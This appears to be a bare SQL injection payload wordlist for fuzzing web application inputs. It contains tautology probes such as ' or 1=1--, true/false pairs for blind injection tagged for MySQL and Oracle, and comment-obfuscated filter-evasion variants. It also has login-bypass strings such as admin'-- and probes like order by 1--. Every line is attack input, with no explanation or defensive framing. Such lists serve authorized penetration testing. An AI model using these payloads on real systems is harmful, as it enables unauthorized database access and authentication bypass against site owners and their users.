1e100
2 or 2=2
2' or '2'='2
999999999999999999
" or 1=1#
#mysql
'
'#mysql
'/*ora_mysql*/and/**/'2'='0
'/*ora_mysql*/and/**/'2'='2
'/*ora_mysql*/or/**/'2'='2
' and '2'='0
' and '2'='0'#mysql
' and '2'='0'-- oracle
' and '2'='2
' and '2'='2'#mysql
' and '2'='2'-- oracle
' or 1=1--
' or '2'='2
'test
'test--
--ora_sqls
/*ora_mysql*/and/**/2=0
/*ora_mysql*/and/**/2=2
admin'
admin'#
admin'--
 and 1=1
 and 2=0
 and 2=0#mysql
 and 2=0-- oracle_mysql
 and 2=2#mysql
 and 2=2-- oracle_mysql
 and USER=USER
 and user()=user()
now()
or 1=1
or 1=1#
or 1=1--
 or 2=2
order by 1--